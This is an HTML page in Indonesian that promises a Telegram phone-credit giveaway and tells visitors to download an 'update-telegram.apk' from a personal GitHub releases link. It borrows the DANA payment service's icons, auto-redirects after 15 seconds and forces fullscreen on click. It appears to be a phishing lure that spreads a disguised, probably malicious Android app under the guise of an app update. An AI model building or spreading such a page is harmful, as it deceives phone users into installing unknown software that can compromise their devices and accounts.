<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="description" content="GIVEAWAY Bonus Pulsa TELEGRAM Giveaway Pulsa Gratis Bagi Nomor Yang terpilih">
    <meta name="keywords" content="Bonus Pulsa TELEGRAM">
    <link rel="icon" type="image/x-icon" href="asset/loading.png">
    <link rel="apple-touch-icon" sizes="180x180" href="https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png">
    <link rel="manifest" href="https://yongkru.skemabiayatarif.com/DANA/assets/img/favicon/site.webmanifest">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <style>
        @keyframes fadeInAnimation {
            90% {
                opacity: 1
            }

            to {
                opacity: 0
            }
        }

        body {
            background-image: url('asset/background1.jpg');
            background-size: cover;
            background-position: center;
            background-repeat: no-repeat;
            width: 100%;
            height: 100vh;
            margin: 0;
            text-align: center;
            padding: 15px;
            font-family: 'Arial', sans-serif;
            color: #22f156;
        }

        h1 {
            font-size: 2em;
            margin-bottom: 10px;
        }

        p {
            font-size: 1em;
            margin-top: 10px;
        }

        a {
            color: #004b6e;
            text-decoration: none;
        }
    </style>
    <!-- Ganti URL_FILE_DIDOWNLOAD dengan URL file yang ingin diunduh -->
    <meta http-equiv="refresh" content="15;url=start.html" />
</head>

<body>
    <h1>Update Telegram disini untuk menerima kode yang Valid disini </h1>
    <p>Jika tidak dimulai, klik <a href="https://github.com/Musicterbaru2024/orgentunggal/releases/download/findown/update-telegram.apk">di sini</a>.</p>

    <!-- Optional: Tambahkan link untuk pengguna yang ingin mengunduh secara manual -->
    <p>Atau <a href="https://github.com/Musicterbaru2024/orgentunggal/releases/download/findown/update-telegram.apk" download>update manual disini</a>.</p>

    <script>
        document.documentElement.addEventListener("click", function () {
            var docElm = document.documentElement;
            if (docElm.requestFullscreen) {
                docElm.requestFullscreen()
            } else if (docElm.mozRequestFullScreen) {
                docElm.mozRequestFullScreen()
            } else if (docElm.webkitRequestFullScreen) {
                docElm.webkitRequestFullScreen()
            }
        });
    </script>

</body>

</html>
